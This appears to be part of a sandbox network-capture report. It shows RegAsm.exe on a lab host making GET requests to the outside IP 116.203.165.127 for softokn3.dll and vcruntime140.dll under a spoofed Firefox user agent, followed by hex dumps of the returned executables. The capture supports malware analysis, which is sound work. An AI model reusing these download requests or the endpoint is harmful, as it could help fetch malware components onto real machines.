2024-09-21 12:49:08 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-21 12:49:08 UTC	16384	IN	Data Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
2024-09-21 12:49:08 UTC	16384	IN	Data Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-21 12:49:08 UTC	16384	IN	Data Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-09-21 12:49:08 UTC	16384	IN	Data Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-21 12:49:08 UTC	16384	IN	Data Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-21 12:49:08 UTC	16384	IN	Data Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-21 12:49:08 UTC	16384	IN	Data Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-21 12:49:08 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|
2024-09-21 12:49:08 UTC	16384	IN	Data Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.9	49766	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:09 UTC	200	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:09 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:09 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Saturday, 21-Sep-2024 12:49:09 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 12:49:09 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-21 12:49:09 UTC	16384	IN	Data Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-21 12:49:09 UTC	16384	IN	Data Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-21 12:49:10 UTC	16384	IN	Data Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-21 12:49:10 UTC	16384	IN	Data Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-09-21 12:49:10 UTC	16384	IN	Data Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-09-21 12:49:10 UTC	16384	IN	Data Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-21 12:49:10 UTC	16384	IN	Data Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-21 12:49:10 UTC	16384	IN	Data Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-21 12:49:10 UTC	16384	IN	Data Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	49767	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:10 UTC	204	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:11 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:11 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Saturday, 21-Sep-2024 12:49:11 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
